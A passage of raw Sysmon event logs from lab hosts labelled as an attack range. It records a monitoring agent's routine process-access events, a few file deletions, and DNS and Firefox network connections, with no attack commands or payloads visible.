Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016722Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.755{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016721Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.752{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016720Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.744{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016719Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.743{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 23542300x800000000000000016718Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.737{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97B124750872ED52D0EF647107165A3B,SHA256=10D982407D26E9493D8D9C5952A1A8EF1D17DD01073303CC8ECB0A8ADC6691F3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000016717Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.736{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016716Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.735{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016715Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.723{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016714Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.718{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016713Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.717{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016712Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.706{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016711Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.704{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016710Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.685{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016709Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.683{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016708Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.657{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 23542300x800000000000000042736Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.895{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A99EE0C74618B0AA5C9783AE3CF21F01,SHA256=8A8996378DAD16FC9995EA2BF05A1CAD7E446DD383FD2CCD0BEF35DA070456E2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000042735Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.322{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local59806- 354300x800000000000000042734Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.304{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56319-false34.107.221.8282.221.107.34.bc.googleusercontent.com80http 354300x800000000000000042733Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.262{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56318-false34.117.237.239239.237.117.34.bc.googleusercontent.com443https 354300x800000000000000042732Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.251{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local63723- 354300x800000000000000042731Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.248{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local58173- 354300x800000000000000042730Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.222{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56317-false34.107.221.8282.221.107.34.bc.googleusercontent.com80http 354300x800000000000000042729Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.219{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56316-false72.21.91.29-80http 354300x800000000000000042728Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.209{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local59739- 354300x800000000000000042727Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.195{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local59394- 354300x800000000000000042726Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.103{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56315-false35.161.176.217ec2-35-161-176-217.us-west-2.compute.amazonaws.com443https 23542300x800000000000000042725Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.835{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\pending_pings\741fdc0f-ef27-46d9-98f3-2f81029e60e3MD5=0A7DE4345DED684C48777FF1193AE127,SHA256=7B70CD29899D14990E4A826716D88066C902343D78996B49A77C20EC51CD38FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000016707Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.648{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016706Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.638{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016705Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.625{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016704Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.616{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016703Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.586{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016702Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.579{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016701Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.572{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016700Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.562{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016699Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.556{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016698Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.548{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016697Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.539{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program 